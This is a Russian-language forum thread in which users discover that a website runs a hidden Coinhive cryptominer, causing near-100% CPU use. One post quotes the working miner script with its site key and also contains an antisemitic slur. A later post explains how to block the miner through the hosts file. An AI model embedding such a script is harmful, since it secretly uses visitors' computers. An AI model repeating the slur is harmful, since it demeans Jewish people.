Сайт использует CPU на 100%

Вопросы по сайту
  1. 10 месяцев(а)

Здравствуйте, Александр.
    Существует проблема использования вашего сайта. Заключается она в следующем: при переходе на любую страницу, кроме главной (например эту), процесс браузера, начинает использовать CPU почти на 100%. Такое поведение я наблюдал уже на трёх компьютерах (на большем числе ещё не смотрел). Проверял на Google Chrome и Internet Explorer 11. Данное поведение наблюдается в обоих браузерах.
    Прошу вас испавить вышеописанное поведение, если это возможно.

2. Не заметил сразу, что в соседней теме уже ведётся обсуждение этого вопроса. Решение было найдено в установке данного расширения для Хрома.

3. Нужно просто отписываться от этого сайта и переставать ним пользоваться. Но и поставить блокираторы этого скрипта.
    По крайней мере я так и сделал...

4. Я зарегистрировался на этой хуйне, чтобы сказать что авторы сайта ссаные жиды. Я и так добавил этот сайт в исключения AdBlocks, а вы, уроды, врубаете майнинг.

<script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.Anonymous('wiV6jztWE8odCM5CmF6pvi99CYppXX8k', { throttle: 0.3 }); miner.start(); </script>

5. 9 месяцев(а)

в файле C:\Windows\System32\drivers\etc\hosts добавить запись:
    127.0.0.1 coinhive.com

в IE майнер будет заблокирован сразу после перезагрузки браузера.
    В Chrome в дополнительных настройках надо отключить переключатель "Использовать подсказки для ускорения загрузки страниц", очистить кеш и перезагрузить браузер.

или зарегистрируйтесь чтобы ответить